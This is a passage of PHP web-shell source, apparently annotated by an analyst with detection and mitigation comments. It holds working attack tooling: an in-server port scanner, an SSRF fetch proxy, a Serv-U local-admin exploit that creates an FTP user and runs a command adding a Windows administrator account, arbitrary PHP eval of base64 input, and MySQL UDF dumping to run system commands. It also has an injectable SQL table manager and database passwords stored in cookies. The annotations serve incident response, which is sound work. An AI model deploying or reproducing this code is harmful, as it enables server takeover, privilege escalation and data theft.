		do_passreturn($_POST['path'],$_POST['code'],$_POST['return'],$bool); 
 
	} 
 
	break; 
 
	 
 
	// Web-shell arm "scanphp": passes a directory and $_POST['class'] to
	// do_passreturn() with the fixed mode "scanphp". The select list offers
	// php/asp/aspx/jsp; whether that select is the field named 'class'
	// depends on html_select(), which is outside this excerpt. What the scan
	// looks for cannot be determined from this excerpt.
	case "scanphp": 
 
	html_n('<tr><td>,.<form method="POST"><br>'); 
 
	html_input("text","path",root_dir,"","40"); 
 
	html_input("checkbox","pass","","<br><br>","",true); 
 
	html_select(array("php" => "PHP","asp" => "ASP","aspx" => "ASPX","jsp" => "JSP")); 
 
	html_input("submit","passreturn","","<br><br>"); 
 
	html_n('</td></tr></form>'); 
 
	if(!empty($_POST['path'])){ 
 
		html_n('<tr><td>:<br><br>'); 
 
		if(isset($_POST['pass'])) $bool = true; else $bool = false; 
 
		do_passreturn($_POST['path'],$_POST['class'],"scanphp",$bool); 
 
	} 
 
	break; 
 
	 
 
	case "port": 
 
	$Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1'; 
 
	$Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|43958|5631|2049|873'; 
 
print<<<END 
 
<form method="POST"> 
 
<div class="actall">IP <input type="text" name="ip" value="{$Port_ip}" style="width:600px;"> </div> 
 
<div class="actall"> <input type="text" name="port" value="{$Port_port}" style="width:597px;"></div> 
 
<div class="actall"><input type="submit" value="" style="width:80px;"></div> 
 
</form> 
 
END; 
 
	// TCP connect probe run from the web server: for every entry of the
	// '|'-separated port list a connection to the POSTed address is
	// attempted with a 2-second timeout, and the result is flushed to the
	// browser as it goes. Because the target is request-controlled, the
	// probes originate from the server's own network position.
	// Detection: a web-server process opening connections to many ports in
	// a short burst.
	// Mitigation: egress rules that limit what the web tier can reach.
	if((!empty($_POST['ip'])) && (!empty($_POST['port']))) 
 
	{ 
 
		echo '<div class="actall">'; 
 
		$ports = explode('|', $_POST['port']); 
 
		for($i = 0;$i < count($ports);$i++) 
 
		{ 
 
			// A truthy handle is reported in red; handles are never closed
			// in this loop.
			$fp = @fsockopen($_POST['ip'],$ports[$i],$errno,$errstr,2); 
echo $fp ? '<font color="#FF0000"> ---> '.$ports[$i].'</font><br>' : ' ---> '.$ports[$i].'<br>'; 
 
			ob_flush(); 
 
			flush(); 
 
		} 
 
		echo '</div>'; 
 
	} 
 
	break; 
 
	 
 
 
 
	// Web-shell arm "getcode": HTTP fetch proxy. The POSTed URL is fetched
	// by the server and the body is echoed back unmodified, so the request
	// reaches its target from the server's address. In effect this is
	// server-side request forgery offered as a feature: hosts that trust
	// the web server (internal-only services, for example) become
	// reachable through the shell.
	// Mitigation: disable allow_url_fopen where not needed and filter
	// egress from the web tier.
	case "getcode": 
 
if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b> URL </b></p></center></body>";exit;} 
 
print<<<END 
 
<table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff"> 
 
 <form method="POST" target="proxyframe"> 
 
  <tr class="firstalt"> 
 
	<td align="center"><b></b></td> 
 
  </tr> 
 
  <tr class="secondalt"> 
 
	<td align="center"  ><br><ul><li> HTTP ,CSS.</li><li>URL, SQL Injection .</li><li> URL,IP : {$_SERVER['SERVER_NAME']}</li></ul></td> 
 
  </tr> 
 
  <tr class="firstalt"> 
 
	<td align="center" height=40  >URL: <input name="url" value="about:blank" type="text"  class="input" size="100" > 
 
 <input name="" value="" type="submit"  class="input" size="30" > 
 
</td> 
 
  </tr> 
 
  <tr class="secondalt"> 
 
	<td align="center"  ><iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="about:blank"></iframe></td> 
 
  </tr> 
 
</form></table> 
 
END; 
 
	break; 
 
	 
 
	case "servu": 
 
	$SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P'; 
 
print<<<END 
 
<div class="actall"><a href="?eanver=servu">[]</a> <a href="?eanver=servu&o=adduser">[]</a></div> 
 
<form method="POST"> 
 
	<div class="actall">ServU <input name="SUPort" type="text" value="43958" style="width:300px"></div> 
 
	<div class="actall">ServU <input name="SUUser" type="text" value="LocalAdministrator" style="width:300px"></div> 
 
	<div class="actall">ServU <input name="SUPass" type="text" value="{$SUPass}" style="width:300px"></div> 
 
END; 
 
if($_GET['o'] == 'adduser') 
 
{ 
 
print<<<END 
 
<div class="actall"> <input name="user" type="text" value="envl" style="width:200px"> 
 
 <input name="password" type="text" value="envl" style="width:200px"> 
 
 <input name="part" type="text" value="C:\\\\" style="width:200px"></div> 
 
END; 
 
} 
 
else 
 
{ 
 
print<<<END 
 
<div class="actall"> <input name="SUCommand" type="text" value="net user envl envl /add & net localgroup administrators envl /add" style="width:600px"><br> 
 
<input name="user" type="hidden" value="envl"> 
 
<input name="password" type="hidden" value="envl"> 
 
<input name="part" type="hidden" value="C:\\\\"></div> 
 
END; 
 
} 
 
echo '<div class="actall"><input type="submit" value="" style="width:80px;"></div></form>'; 
 
	// Scripted session against a Serv-U FTP daemon's local administration
	// port on 127.0.0.1, using the port, account and password from the form
	// (the form rendered earlier in this arm pre-fills port 43958 and the
	// LocalAdministrator account). Every line sent and received is echoed
	// to the page without escaping.
	// Indicators visible in this block: the domain name "haxorcitos", an
	// FTP user with home c:\ and access flags RWAMELCDP, and (from the
	// pre-filled form values) the account name "envl".
	// Detection: loopback connections from the web-server process to the
	// FTP admin port, unexpected domain/user entries in the FTP server
	// configuration, new local Windows accounts.
	// Mitigation: presumably this depends on the local administration
	// password being known or unchanged; change it, keep the FTP service
	// patched and run it with low privileges.
	if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass']))) 
 
	{ 
 
		echo '<div class="actall">'; 
 
		$sendbuf = ""; 
 
		$recvbuf = ""; 
 
		// Three administrative command blocks: define a domain on port 21,
		// add a user to it (name, password and access path from the POST
		// body), and delete the domain again.
		$domain  = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n"; 
 
		$adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n". 
 
							 "-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n". 
 
							 "-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n"; 
 
		$deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n"; 
 
		// Admin-port conversation: banner, USER, PASS, SITE MAINTENANCE,
		// then the domain and user blocks. Socket errors are suppressed
		// with @ and never checked.
		$sock = @fsockopen("127.0.0.1", $_POST["SUPort"],$errno,$errstr, 10); 
 
		$recvbuf = @fgets($sock, 1024); 
 
		echo ": $recvbuf <br>"; 
 
		$sendbuf = "USER ".$_POST["SUUser"]."\r\n"; 
 
		@fputs($sock, $sendbuf, strlen($sendbuf)); 
 
		echo ": $sendbuf <br>"; 
 
		$recvbuf = @fgets($sock, 1024); 
 
		echo ": $recvbuf <br>"; 
 
		$sendbuf = "PASS ".$_POST["SUPass"]."\r\n"; 
 
		@fputs($sock, $sendbuf, strlen($sendbuf)); 
 
		echo ": $sendbuf <br>"; 
 
		$recvbuf = @fgets($sock, 1024); 
 
		echo ": $recvbuf <br>"; 
 
		$sendbuf = "SITE MAINTENANCE\r\n"; 
 
		@fputs($sock, $sendbuf, strlen($sendbuf)); 
 
		echo ": $sendbuf <br>"; 
 
		$recvbuf = @fgets($sock, 1024); 
 
		echo ": $recvbuf <br>"; 
 
		$sendbuf = $domain; 
 
		@fputs($sock, $sendbuf, strlen($sendbuf)); 
 
		echo ":$sendbuf <br>"; 
 
		$recvbuf = @fgets($sock, 1024); 
 
		echo ": $recvbuf <br>"; 
 
		$sendbuf = $adduser; 
 
		@fputs($sock, $sendbuf, strlen($sendbuf)); 
 
		echo ": $sendbuf <br>"; 
 
		$recvbuf = @fgets($sock, 1024); 
 
		echo ": $recvbuf <br>"; 
 
		// Optional second stage: a separate connection to port 21 logs in
		// as the user just created and sends a `site exec` line carrying
		// the POSTed command; the domain is then deleted over the admin
		// socket.
		if(!empty($_POST['SUCommand'])) 
 
		{ 
 
	 		$exp = @fsockopen("127.0.0.1", "21",$errno,$errstr, 10); 
 
	 		$recvbuf = @fgets($exp, 1024); 
 
	 		echo ": $recvbuf <br>"; 
 
	 		$sendbuf = "USER ".$_POST['user']."\r\n"; 
 
	 		@fputs($exp, $sendbuf, strlen($sendbuf)); 
 
	 		echo ": $sendbuf <br>"; 
 
	 		$recvbuf = @fgets($exp, 1024); 
 
	 		echo ": $recvbuf <br>"; 
 
	 		$sendbuf = "PASS ".$_POST['password']."\r\n"; 
 
	 		@fputs($exp, $sendbuf, strlen($sendbuf)); 
 
	 		echo ": $sendbuf <br>"; 
 
	 		$recvbuf = @fgets($exp, 1024); 
 
	 		echo ": $recvbuf <br>"; 
 
	 		$sendbuf = "site exec ".$_POST["SUCommand"]."\r\n"; 
 
	 		@fputs($exp, $sendbuf, strlen($sendbuf)); 
 
	 		echo ": site exec <font color=#006600>".$_POST["SUCommand"]."</font> <br>"; 
 
	 		$recvbuf = @fgets($exp, 1024); 
 
	 		echo ": $recvbuf <br>"; 
 
	 		$sendbuf = $deldomain; 
 
	 		@fputs($sock, $sendbuf, strlen($sendbuf)); 
 
	 		echo ": $sendbuf <br>"; 
 
	 		$recvbuf = @fgets($sock, 1024); 
 
	 		echo ": $recvbuf <br>"; 
 
	 		@fclose($exp); 
 
		} 
 
		@fclose($sock); 
 
		echo '</div>'; 
 
	} 
 
	break; 
 
	 
 
	// Web-shell arm "phpcode": arbitrary PHP execution. The `phpcode` POST
	// field is base64-encoded in the browser (SubmitUrl below), decoded
	// here and passed to eval(). The copy echoed back into the textarea is
	// HTML-escaped; the copy given to eval() is not filtered in any way.
	// Incident response: where POST bodies were captured (WAF, proxy,
	// full-request logging), base64-decoding the `phpcode` field
	// reconstructs exactly what was executed.
	case "phpcode": 
 
	$phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();"; 
 
    if($phpcode!='phpinfo();')$phpcode = htmlspecialchars(base64_decode($phpcode)); 
 
	echo '<script language="javascript">'; 
 
    // html_base() is defined outside this excerpt; presumably it emits the
    // base64encode() JavaScript helper used by SubmitUrl.
    html_base(); 
 
	echo 'function SubmitUrl(){ 
 
			document.getElementById(\'phpcode\').value = base64encode(document.getElementById(\'phpcode\').value); 
 
			document.getElementById(\'sendcode\').submit(); 
 
	}</script><tr><td><form method="POST" id="sendcode" >&lt;? ?&gt;,BASE64<br><br><textarea COLS="120" ROWS="35" name="phpcode" id="phpcode">'.$phpcode.'</textarea><br><br><input type="button" value="" onclick="SubmitUrl();" style="width:80px;">'; 
 
	// Execution point: request-supplied code is run with eval().
	if(!empty($_POST['phpcode'])){ 
 
	echo "<br><br>"; 
 
    eval(stripslashes(base64_decode($_POST['phpcode']))); 
 
	} 
 
	html_n('</form>'); 
 
	break; 
 
 
 
	// Web-shell arm "myexp": turns MySQL access into operating-system
	// command execution through a user-defined function (UDF) library.
	// Sequence visible below: connect with POSTed credentials, choose a
	// destination path, write a binary blob to it with INTO DUMPFILE,
	// register it with CREATE FUNCTION ... SONAME as sys_eval, then call
	// sys_eval() with a POSTed command string.
	// Indicators visible in this block: table Envl_Temp_Tab, function
	// sys_eval, files BH.dll / BH64.dll under the plugin directory or
	// C:/WINDOWS.
	// Detection: CREATE FUNCTION ... SONAME and INTO DUMPFILE in audit
	// logs, unexpected rows in mysql.func, new files in plugin_dir.
	// Mitigation: no FILE privilege and no write access to the mysql
	// system schema for application accounts, a restrictive
	// secure_file_priv, and a plugin directory the database service
	// account cannot write to.
	case "myexp": 
 
	$MSG_BOX = 'DLL,.MYSQLroot,DLL.'; 
 
	$info = ''; 
 
	$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $mpath = ''; $sqlcmd = 'ver'; 
 
	if(isset($_POST['mhost']) && isset($_POST['muser'])) 
 
	{ 
 
		// The mysql64 checkbox selects the library file name (BH64.dll vs
		// BH.dll); all connection values and the command are taken from
		// the POST body.
		@$mysql64 = isset($_POST['mysql64'])?true:false;if($mysql64){$mysql64='checked';$BH='BH64.dll';}else{$BH='BH.dll';} $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; $mpath = File_Str($_POST['mpath']); $sqlcmd = $_POST['sqlcmd']; 
 
		$conn = mysql_connect($mhost.':'.$mport,$muser,$mpass); 
 
		if($conn) 
 
		{ 
 
			@mysql_select_db($mdata); 
 
			/*************************************/ 
 
			$str=mysql_get_server_info(); 
 
			//echo 'MYSQL:'.$str."  "; 
 
 
 
			// $str[2] is the third character of the server version string;
			// when it compares >= 1 the destination is built from the
			// server's plugin_dir variable, otherwise C:/WINDOWS/ is used.
			if($str[2]>=1){ 
 
			$sql="SHOW VARIABLES LIKE '%plugin_dir%'"; 
 
			$row=mysql_query($sql,$conn); 
 
			$rows=mysql_fetch_row($row); 
 
			$pa=str_replace('\\','/',$rows[1]); 
 
			$path=$pa.$BH; 
 
 
 
			}else{ 
 
			$path='C:/WINDOWS/'.$BH; 
 
			} 
 
			//$mpath=$path; 
 
			// A path posted by the operator takes precedence over the
			// computed one.
			if(!empty($mpath)) 
 
			{ 
 
				$mpath=$mpath; 
 
			}else{ 
 
				$mpath=$path; 
 
			} 
 
			/*************************************/ 
 
			// "outdll" action: stage the blob in a scratch table, dump it
			// to $mpath, register the function, drop the table.
			// Mysql_shellcode() / Mysql_shellcode64() are defined outside
			// this excerpt; presumably they return the library as a hex
			// literal.
			if((!empty($_POST['outdll'])) && (!empty($mpath))) 
 
			{ 
 
				$query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);"; 
 
				if(@mysql_query($query,$conn)) 
 
				{ 
 
					$shellcode = $mysql64?Mysql_shellcode64():Mysql_shellcode(); 
 
					$query = "INSERT into Envl_Temp_Tab values (CONVERT(".$shellcode.",CHAR));"; 
 
					if(@mysql_query($query,$conn)) 
 
					{ 
 
						$query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \''.$mpath.'\';'; 
 
						if(@mysql_query($query,$conn)) 
 
						{ 
 
							// Only the last path component is used as the
							// SONAME.
							$ap = explode('/', $mpath); $inpath = array_pop($ap); 
 
							$query = 'Create Function sys_eval returns string soname \''.$inpath.'\';'; 
 
							$MSG_BOX = @mysql_query($query,$conn) ? 'DLL' : 'DLL'.mysql_error(); 
 
						} 
 
						else $MSG_BOX = 'DLL'.mysql_error(); 
 
					} 
 
					else $MSG_BOX = ''; 
 
					@mysql_query('DROP TABLE Envl_Temp_Tab;',$conn); 
 
				} 
 
				else $MSG_BOX = ''; 
 
			} 
 
			// "runcmd" action: the POSTed command is concatenated into a
			// sys_eval() call and the result is collected for display in
			// the textarea rendered after this block.
			if(!empty($_POST['runcmd'])) 
 
			{ 
 
				$query = 'select sys_eval("'.$sqlcmd.'");'; 
 
				$result = @mysql_query($query,$conn); 
 
				if($result) 
 
				{ 
 
					$k = 0; $info = NULL; 
 
					while($row = @mysql_fetch_array($result)){$infotmp .= $row[$k];$k++;} 
 
					$info = $infotmp; 
 
					$MSG_BOX = ''; 
 
				} 
 
				else $MSG_BOX = ''; 
 
			} 
 
		} 
 
		else $MSG_BOX = 'MYSQL'; 
 
	} 
 
print<<<END 
 
<form id="mform" method="POST"> 
 
<div id="msgbox" class="msgbox">{$MSG_BOX}</div> 
 
<center><div class="actall"> 
 
 <input type="text" name="mhost" value="{$mhost}" style="width:110px"> 
 
 <input type="text" name="mport" value="{$mport}" style="width:110px"> 
 
 <input type="text" name="muser" value="{$muser}" style="width:110px"> 
 
 <input type="text" name="mpass" value="{$mpass}" style="width:110px"> 
 
 <input type="text" name="mdata" value="{$mdata}" style="width:110px"> 
 
</div><div class="actall"> 
 
() <input type="text" id='dlllj' name="mpath" value="{$mpath}" style="width:500px">  
 
64MYSQL <input type="checkbox" onclick="document.getElementById('dlllj').value='';" name="mysql64" value="1" {$mysql64} /> 
 
<input type="submit" name="outdll" value="DLL" style="width:80px;"></div> 
 
<div class="actall">MYSQL <br><input type="text" name="sqlcmd" value="{$sqlcmd}" style="width:635px;"> 
 
<input type="submit" name="runcmd" value="" style="width:80px;"> 
 
<br /> 
 
<pre> 
 
<textarea style="width:720px;height:300px;">{$info}</textarea> 
 
</pre> 
 
</div></center> 
 
</form> 
 
END; 
 
	break; 
 
	 
 
 
 
	// Web-shell arm "mysql_exec": login step for the "mysql_msg" arm. The
	// POSTed host, port, user and password are tested with a connection
	// attempt and, on success, stored in four cookies (m_eanverhost,
	// m_eanverport, m_eanveruser, m_eanverpass) for 24 hours, so the
	// database password is sent in clear text with every later request.
	// Incident response: these cookie names are a searchable indicator in
	// proxy and web logs that record request headers, and any database
	// account seen in them should be treated as compromised.
	case "mysql_exec": 
 
  if(isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass'])) 
 
  { 
 
  	if(@mysql_connect($_POST['mhost'].':'.$_POST['mport'],$_POST['muser'],$_POST['mpass'])) 
 
	  { 
 
	  	$cookietime = time() + 24 * 3600; 
 
	  	setcookie('m_eanverhost',$_POST['mhost'],$cookietime); 
 
	  	setcookie('m_eanverport',$_POST['mport'],$cookietime); 
 
	  	setcookie('m_eanveruser',$_POST['muser'],$cookietime); 
 
	  	setcookie('m_eanverpass',$_POST['mpass'],$cookietime); 
 
	  	// The script stops here with a meta-refresh to the mysql_msg arm.
	  	die(',...<meta http-equiv="refresh" content="0;URL=?eanver=mysql_msg">'); 
 
	  } 
 
  } 
 
print<<<END 
 
<form method="POST" name="oform" id="oform"> 
 
<div class="actall"> <input type="text" name="mhost" value="localhost" style="width:300px"></div> 
 
<div class="actall"> <input type="text" name="mport" value="3306" style="width:300px"></div> 
 
<div class="actall"> <input type="text" name="muser" value="root" style="width:300px"></div> 
 
<div class="actall"> <input type="text" name="mpass" value="" style="width:300px"></div> 
 
<div class="actall"><input type="submit" value="" style="width:80px;"> <input type="button" value="COOKIE" style="width:80px;" onclick="window.location='?eanver=mysql_msg';"></div> 
 
</form> 
 
END; 
 
break; 
 
 
 
case "mysql_msg": 
 
	$conn = @mysql_connect($_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'],$_COOKIE['m_eanveruser'],$_COOKIE['m_eanverpass']); 
 
	if($conn) 
 
	{ 
 
print<<<END 
 
<script language="javascript"> 
 
function Delok(msg,gourl) 
 
{ 
 
	smsg = "[" + unescape(msg) + "]?"; 
 
	if(confirm(smsg)){window.location = gourl;} 
 
	window.location = gourl; 
 
} 
 
function Createok(ac) 
 
{ 
 
	if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (eanver BLOB);'; 
 
	if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;'; 
 
	if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;'; 
 
	return false; 
 
} 
 
END; 
 
html_base(); 
 
print<<<END 
 
function SubmitUrl(){ 
 
			document.getElementById('nsql').value = base64encode(document.getElementById('nsql').value); 
 
			document.getElementById('gform').submit(); 
 
} 
 
</script> 
 
END; 
 
		$BOOL = false; 
 
		$MSG_BOX = ':'.$_COOKIE['m_eanveruser'].' &nbsp;&nbsp;&nbsp;&nbsp; :'.$_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'].' &nbsp;&nbsp;&nbsp;&nbsp; :'; 
 
		$k = 0; 
 
		$result = @mysql_query('select version();',$conn); 
 
		while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;} 
 
		echo '<div class="actall"> :'; 
 
		$result = mysql_query("SHOW DATABASES",$conn); 
 
		while($db = mysql_fetch_array($result)){echo '&nbsp;&nbsp;[<a href="?eanver=mysql_msg&db='.$db['Database'].'">'.$db['Database'].'</a>]';} 
 
		echo '</div>'; 
 
		if(isset($_GET['db'])) 
 
		{ 
 
			mysql_select_db($_GET['db'],$conn); 
 
            $_POST['nsql']=base64_decode($_POST['nsql']); 
 
			if(!empty($_POST['nsql'])){$BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? '' : ' '.mysql_error();} 
 
			if(is_array($_POST['insql'])) 
 
			{ 
 
				$query = 'INSERT INTO '.$_GET['table'].' ('; 
 
				foreach($_POST['insql'] as $var => $key) 
 
				{ 
 
					$querya .= $var.','; 
 
					$queryb .= '\''.addslashes($key).'\','; 
 
				} 
 
				$query = $query.substr($querya, 0, -1).') VALUES ('.substr($queryb, 0, -1).');'; 
 
				$MSG_BOX = mysql_query($query,$conn) ? '' : ' '.mysql_error(); 
 
			} 
 
			if(is_array($_POST['upsql'])) 
 
			{ 
 
				$query = 'UPDATE '.$_GET['table'].' SET '; 
 
				foreach($_POST['upsql'] as $var => $key) 
 
				{ 
 
					$queryb .= $var.'=\''.addslashes($key).'\','; 
 
				} 
 
				$query = $query.substr($queryb, 0, -1).' '.base64_decode($_POST['wherevar']).';'; 
 
				$MSG_BOX = mysql_query($query,$conn) ? '' : ' '.mysql_error(); 
 
			} 
 
			if(isset($_GET['del'])) 
 
			{ 
 
				$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['del'].', 1;',$conn); 
 
				$good = mysql_fetch_assoc($result); 
 
				$query = 'DELETE FROM '.$_GET['table'].' WHERE '; 
 
				foreach($good as $var => $key){$queryc .= $var.'=\''.addslashes($key).'\' AND ';} 
 
				$where = $query.substr($queryc, 0, -4).';'; 
 
				$MSG_BOX = mysql_query($where,$conn) ? '' : ' '.mysql_error(); 
 
			} 
 
			$action = '?eanver=mysql_msg&db='.$_GET['db']; 
 
			if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? '' : ' '.mysql_error();} 
 
			if(isset($_GET['table'])){$action .= '&table='.$_GET['table'];if(isset($_GET['edit'])) $action .= '&edit='.$_GET['edit'];} 
 
			if(isset($_GET['insert'])) $action .= '&insert='.$_GET['insert']; 
 
			echo '<div class="actall"><form method="POST" action="'.$action.'" name="gform" id="gform">'; 
 
			echo '<textarea name="nsql" id="nsql" style="width:500px;height:50px;">'.$_POST['nsql'].'</textarea> '; 
 
			echo '<input type="button" name="querysql" value="" onclick="SubmitUrl();" style="width:60px;height:49px;">'; 
 
			echo '<input type="button" value="" style="width:60px;height:49px;" onclick="Createok(\'a\')"> '; 
 
			echo '<input type="button" value="" style="width:60px;height:49px;" onclick="Createok(\'b\')"> '; 
 
			echo '<input type="button" value="" style="width:60px;height:49px;" onclick="Createok(\'c\')"></form></div>'; 
 
			echo '<div class="msgbox" style="height:40px;">'.$MSG_BOX.'</div><div class="actall"><a href="?eanver=mysql_msg&db='.$_GET['db'].'">'.$_GET['db'].'</a> ---> '; 
 
			if(isset($_GET['table'])) 
 
			{ 
 
				echo '<a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'">'.$_GET['table'].'</a> '; 
 
				echo '[<a href="?eanver=mysql_msg&db='.$_GET['db'].'&insert='.$_GET['table'].'"></a>]</div>'; 
 
				if(isset($_GET['edit'])) 
 
				{ 
 
					if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table']; 
 
					echo '<form method="POST" action="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$atable.'">'; 
 
					$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['edit'].', 1;',$conn); 
 
					$good = mysql_fetch_assoc($result); 
 
					$u = 0; 
 
					foreach($good as $var => $key) 
 
					{ 
 
						$queryc .= $var.'=\''.$key.'\' AND '; 
 
						$type = @mysql_field_type($result, $u); 
 
						$len = @mysql_field_len($result, $u); 
 
						echo '<div class="actall">'.$var.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="upsql['.$var.']" style="width:600px;height:60px;">'.htmlspecialchars($key).'</textarea></div>'; 
 
						$u++; 
 
					} 
 
					$where = 'WHERE '.substr($queryc, 0, -4); 
 
					echo '<input type="hidden" id="wherevar" name="wherevar" value="'.base64_encode($where).'">'; 
 
					echo '<div class="actall"><input type="submit" value="Update" style="width:80px;"></div></form>'; 
 
				} 
 
				else 
 
				{ 
 
					$query = 'SHOW COLUMNS FROM '.$_GET['table']; 
 
		      $result = mysql_query($query,$conn); 
 
		      $fields = array(); 
 
			  $pagesize=20; 
 
		      $row_num = mysql_num_rows(mysql_query('SELECT * FROM '.$_GET['table'],$conn)); 
 
			  $numrows=$row_num; 
 
              $pages=intval($numrows/$pagesize); 
 
              if ($numrows%$pagesize) $pages++; 
 
              $offset=$pagesize*($page - 1); 
 
              $page=$_GET['p']; 
 
              if(!$page) $page=1; 
 
 
 
		      if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20; 
 
					echo '<table border="0"><tr>'; 
 
					echo '<td class="toptd" style="width:70px;" nowrap></td>'; 
 
					while($row = @mysql_fetch_assoc($result)) 
 
					{ 
 
						array_push($fields,$row['Field']); 
 
						echo '<td class="toptd" nowrap>'.$row['Field'].'</td>'; 
 
					} 
 
					echo '</tr>'; 
 
					if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $query = $_POST['nsql']; else $query = 'SELECT * FROM '.$_GET['table'].' LIMIT '.$p.', 20;'; 
 
					$result = mysql_query($query,$conn); 
 
					$v = $p; 
 
					while($text = @mysql_fetch_assoc($result)) 
 
					{ 
 
						echo '<tr><td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&edit='.$v.'">  </a> '; 
 
						echo '<a href="#" onclick="Delok(\'\',\'?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&del='.$v.'\');return false;">  </a></td>'; 
 
						foreach($fields as $row){echo '<td>'.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).'</td>';} 
 
						echo '</tr>'."\r\n";$v++; 
 
					} 
 
					echo '</table><div class="actall">'; 
 
                    $pagep=$page-1; 
 
                    $pagen=$page+1; 
 
                    echo " ".$row_num."  "; 
 
                    if($pagep>0) $pagenav.="  <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=1&charset=".$_GET['charset']."'></a> <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagep."&charset=".$_GET['charset']."'></a> "; else $pagenav.="  "; 
 
                    if($pagen<=$pages) $pagenav.=" <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagen."&charset=".$_GET['charset']."'></a> <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pages."&charset=".$_GET['charset']."'></a>"; else $pagenav.="  "; 
 
                    $pagenav.="  [".$page."/".$pages."]    <input name='textfield' type='text' style='text-align:center;' size='4' value='".$page."' onkeydown=\"if(event.keyCode==13)self.location.href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p='+this.value+'&charset=".$_GET['charset']."';\" />"; 
 
                    echo $pagenav; 
 
					echo '</div>'; 
 
				} 
 
			} 
 
			elseif(isset($_GET['insert'])) 
 
			{ 
 
				echo '<a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['insert'].'">'.$_GET['insert'].'</a></div>'; 
 
				$result = mysql_query('SELECT * FROM '.$_GET['insert'],$conn); 
 
				$fieldnum = @mysql_num_fields($result); 
 
				echo '<form method="POST" action="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['insert'].'">'; 
 
				for($i =0;$i < $fieldnum;$i++) 
 
				{ 
 
					$name = @mysql_field_name($result, $i); 
 
					$type = @mysql_field_type($result, $i); 
 
					$len = @mysql_field_len($result, $i); 
 
					echo '<div class="actall">'.$name.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="insql['.$name.']" style="width:600px;height:60px;"></textarea></div>'; 
 
				} 
 
				echo '<div class="actall"><input type="submit" value="Insert" style="width:80px;"></div></form>'; 
 
			} 
 
			else 
 
			{ 
 
				$query = 'SHOW TABLE STATUS'; 
 
				$status = @mysql_query($query,$conn); 
 
				while($statu = @mysql_fetch_array($status)) 
 
				{ 
 
					$statusize[] = $statu['Data_length']; 
 
					$statucoll[] = $statu['Collation']; 
 
				} 
 
				$query = 'SHOW TABLES FROM '.$_GET['db'].';'; 
 
				echo '</div><table border="0"><tr>'; 
 
				echo '<td class="toptd" style="width:550px;">  </td>'; 
 
				echo '<td class="toptd" style="width:80px;">  </td>'; 
 
